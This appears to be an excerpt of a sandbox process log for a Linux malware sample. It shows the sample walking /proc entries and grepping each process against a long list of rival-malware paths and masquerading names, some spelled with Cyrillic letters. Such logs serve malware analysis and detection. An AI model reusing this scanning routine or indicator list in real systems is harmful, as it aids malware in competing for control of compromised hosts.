/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1090
-
-
/bin/grepgrep exe4⤵PID:1093
-
-
/bin/lsls -latrh /proc/7234⤵PID:1092
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1095
-
-
/bin/grepgrep exe4⤵PID:1098
-
-
/bin/lsls -latrh /proc/7244⤵PID:1097
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1100
-
-
/bin/grepgrep exe4⤵PID:1103
-
-
/bin/lsls -latrh /proc/7264⤵PID:1102
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1105
-
-
/bin/grepgrep exe4⤵PID:1108
-
-
/bin/lsls -latrh /proc/7274⤵PID:1107
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1110
-
-
/bin/lsls -latrh /proc/734⤵PID:1112
-
-
/bin/grepgrep exe4⤵PID:1113
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1115
-
-
/bin/grepgrep exe4⤵PID:1118
-
-
/bin/lsls -latrh /proc/7334⤵PID:1117
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1120
-
-
/bin/grepgrep exe4⤵PID:1123
-
-
/bin/lsls -latrh /proc/744⤵PID:1122
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1125
-
-
/bin/grepgrep exe4⤵PID:1128
-
-
/bin/lsls -latrh /proc/754⤵PID:1127
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1130
-
-
/bin/grepgrep exe4⤵PID:1133
-
-
/bin/lsls -latrh /proc/764⤵PID:1132
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1135
-
-
/bin/grepgrep exe4⤵PID:1138
-
-
/bin/lsls -latrh /proc/7624⤵PID:1137
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1140
-
-
/bin/lsls -latrh /proc/7664⤵PID:1142
-
-
/bin/grepgrep exe4⤵PID:1143
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1145
-
-
/bin/grepgrep exe4⤵PID:1148
-
-
/bin/lsls -latrh /proc/7684⤵PID:1147
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1150
-
-
/bin/grepgrep exe4⤵PID:1153
-
-
/bin/lsls -latrh /proc/7694⤵PID:1152
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1155
-
-
/bin/grepgrep exe4⤵PID:1158
-
-
/bin/lsls -latrh /proc/774⤵PID:1157
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1160
-
-
/bin/grepgrep exe4⤵PID:1163
-
-
/bin/lsls -latrh /proc/7714⤵PID:1162
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1165
-
-
/bin/grepgrep exe4⤵PID:1168
-
-
/bin/lsls -latrh /proc/7724⤵PID:1167
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1170
-
-
/bin/grepgrep exe4⤵PID:1173
-
-
/bin/lsls -latrh /proc/7734⤵PID:1172
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1175
-
-
/bin/grepgrep exe4⤵PID:1178
-
-
/bin/lsls -latrh /proc/784⤵PID:1177
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1180
-
-
/bin/grepgrep exe4⤵PID:1183
-
-
/bin/lsls -latrh /proc/84⤵PID:1182
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1185
-
-
/bin/grepgrep exe4⤵PID:1188
-
-
/bin/lsls -latrh /proc/814⤵PID:1187
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1190
-
-
/bin/grepgrep exe4⤵PID:1193
-
-
/bin/lsls -latrh /proc/824⤵PID:1192
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1195
-
-
/bin/grepgrep exe4⤵PID:1198
-
-
/bin/lsls -latrh /proc/94⤵PID:1197
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1200
-
-
/bin/grepgrep exe4⤵PID:1203
-
-
/bin/lsls -latrh /proc/buddyinfo4⤵PID:1202
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1205
-
-
/bin/grepgrep exe4⤵PID:1208
-
-
/bin/lsls -latrh /proc/bus4⤵PID:1207
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1210
-
-
/bin/grepgrep exe4⤵PID:1215
-
-
/bin/lsls -latrh /proc/cgroups4⤵PID:1214
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1217
-
-
/bin/grepgrep exe4⤵PID:1221
-
-
/bin/lsls -latrh /proc/cmdline4⤵PID:1220
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1224
-
-
/bin/grepgrep exe4⤵PID:1227
-
-
/bin/lsls -latrh /proc/consoles4⤵PID:1226
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1230
-
-
/bin/grepgrep exe4⤵PID:1234
-
-
/bin/lsls -latrh /proc/cpuinfo4⤵PID:1233
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1236
-
-
/bin/grepgrep exe4⤵PID:1240
-
-
/bin/lsls -latrh /proc/crypto4⤵PID:1239
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1243
-
-
/bin/grepgrep exe4⤵PID:1246
-
-
/bin/lsls -latrh /proc/devices4⤵PID:1245
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1249
-
-
/bin/grepgrep exe4⤵PID:1253
-
-
/bin/lsls -latrh /proc/device-tree4⤵PID:1252
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1255
-
-
/bin/grepgrep exe4⤵PID:1259
-
-
/bin/lsls -latrh /proc/diskstats4⤵PID:1258
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1262
-
-
/bin/grepgrep exe4⤵PID:1266
-
-
/bin/lsls -latrh /proc/dma4⤵PID:1265
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1269
-
-
/bin/grepgrep exe4⤵PID:1272
-
-
/bin/lsls -latrh /proc/driver4⤵PID:1271
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1275
-
-
/bin/grepgrep exe4⤵PID:1279
-
-
/bin/lsls -latrh /proc/execdomains4⤵PID:1278
-
-
